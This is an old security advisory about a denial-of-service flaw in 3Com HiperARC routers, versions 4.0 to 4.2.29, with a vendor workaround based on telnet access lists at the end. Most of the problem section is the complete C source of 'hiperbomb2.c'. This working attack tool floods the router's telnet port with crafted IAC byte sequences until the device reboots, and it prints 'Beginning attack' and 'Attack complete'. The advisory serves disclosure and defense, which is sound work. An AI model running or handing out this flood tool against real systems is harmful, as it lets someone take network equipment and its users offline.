COMMAND
	    3COM HiperARC
SYSTEMS AFFECTED
	    3COM HiperARC 4.0...4.2.29
PROBLEM
	    Jonathan Chapman found following.   The program below will  reboot
	    a 3com HiperARC.  By flooding  the telnet port of a 3com  HiperARC
	    using the provided program, the HiperARC unconditionally  reboots.
	    This program is effective over all interfaces, including a dialup.
	
	    /* ---------------------------------------------------------------------
	     * hiperbomb2.c - Reboots HiperARC faster.
	     * ---------------------------------------------------------------------
	     * (c) 1999 - Jonathan Chapman <[email protected]>
	     * ---------------------------------------------------------------------
	     * Sends a high volume of IACs which eventually leads to a reboot of the
	     * HiperARC.  Brief testing indicated that this problem is most likely
	     * specific to sending IACs rather than any other type of data.  Further
	     * research has shown that specific IAC patterns are more likely to cause
	     * a reboot.  In this example I use one of the most efficient combinations
	     * I have discovered.  Through my testing it usually required at least
	     * 60,000 packets to cause the HiperARC to reboot.
	     * ---------------------------------------------------------------------
	     */
	    #include <stdio.h>
	    #include <stdarg.h>
	    #include <fcntl.h>
	    #include <netdb.h>
	    #include <netinet/in.h>
	    #include <sys/socket.h>
	    char *chassis;
	    int sockfd, num_of_tries;
	    void connect_to_chassis(char *name)
	    {
		    struct hostent *host;
		    struct sockaddr_in remote;
		    host = gethostbyname(name);
		    if(!host) {
		    fprintf(stderr, "Cannot resolve host %s.\n", name);
		    exit(3);
		    }
		    sockfd = socket(AF_INET, SOCK_STREAM, 0);
		    if(sockfd < 0) {
		    fprintf(stderr, "Cannot obtain descriptor.\n");
		    exit(4);
		    }
		    remote.sin_family = AF_INET;
		    remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
		    remote.sin_port = htons(23);
		    connect(sockfd, (struct sockaddr *)&remote, sizeof(remote));
		    return;
	    }
	    void send_iacs()
	    {
		    unsigned char reply[3] = {254, 36, 185};
		    unsigned int k;
		    for(k = 0; k < num_of_tries; k++) {
		    write(sockfd, reply, 3);
		    }
	    }
	    int main(int ac, char **av)
	    {
		    if(ac < 3) {
		    fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]);
		    fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
		    exit(2);
		    }
		    chassis = av[1];
		    num_of_tries = atoi(av[2]);
		    fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n",
			    chassis, num_of_tries);
		    connect_to_chassis(chassis);
		    send_iacs();
		    fprintf(stderr, "Attack complete.\n");
		    exit(0);
	    }
	
	    This has been  confirmed on 3Com  Corporation HiPer Access  Router
	    Card Built on Feb 16 1999 at 12:42:34.  System Version:  V4.1.59.
SOLUTION
	    3Com acknowledges and has verified the existence of the  hiperbomb
	    DOS attack.  All HiPer  ARC software (4.0 - 4.2.29)  is vulnerable
	    to  the  attack.   The  following  workaround  will  protect  your
	    equipment until the software  patch becomes available.   Defect is
	    logged  under  3Com  MR#11022.   It  is  possible  to add a telnet
	    access list of trusted hosts on  the HiPer ARC. It can be  assumed
	    that the attack  will not come  from a trusted  host.  It  is also
	    recommended that you do no allow any telnet sessions from  outside
	    your network.  To add a telnet access list:
	
	        1) add telnet clients. These clients may be individual hosts or networks.
	            "ADD TELNET CLIENT X.X.X.X"
	            "LIST TELNET CLIENTS" will list all configured clients
	        2) Enable the telnet client access list feature.
	            "ENABLE TELNET CLIENT_ACCESS"